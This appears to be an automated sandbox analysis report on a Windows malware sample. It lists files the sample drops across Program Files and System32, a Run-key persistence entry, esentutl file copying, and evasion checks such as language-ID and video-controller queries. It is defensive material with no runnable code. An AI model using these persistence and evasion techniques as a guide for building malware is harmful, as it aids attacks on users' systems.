Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Jwsmvmdw.PIF Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\wdmvmswJ.pif Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\VSSVC.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\wbengine.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\SearchIndexer.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\AgentService.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\OpenSSH\ssh-agent.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\snmptrap.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\Spectrum.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\Locator.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\AppVClient.exe Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File created: C:\Windows\System32\vds.exe Jump to dropped file

Boot Survival

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 30_2_1002CBD0
Source: C:\Users\user\AppData\Local\Temp\x.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_02B0AB1C
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\AppVClient.exe Code function: 22_2_007252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 22_2_007252A0
Source: C:\Windows\System32\FXSSVC.exe Code function: 25_2_009452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_009452A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 28_2_022952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 28_2_022952A0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: 20CD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: 20FC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: 20D10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: 26770000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: 269E0000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: 26770000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: 1E800000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: 1ED40000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: 1E800000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9, 12_1_004019F0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Window / User API: threadDelayed 5124
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Window / User API: threadDelayed 4310
Source: C:\Windows\System32\msdtc.exe Window / User API: threadDelayed 484
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\vds.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\TieringEngineService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Dropped PE file which has not been started: C:\Windows\System32\sppsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\wbengine.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\AgentService.exe
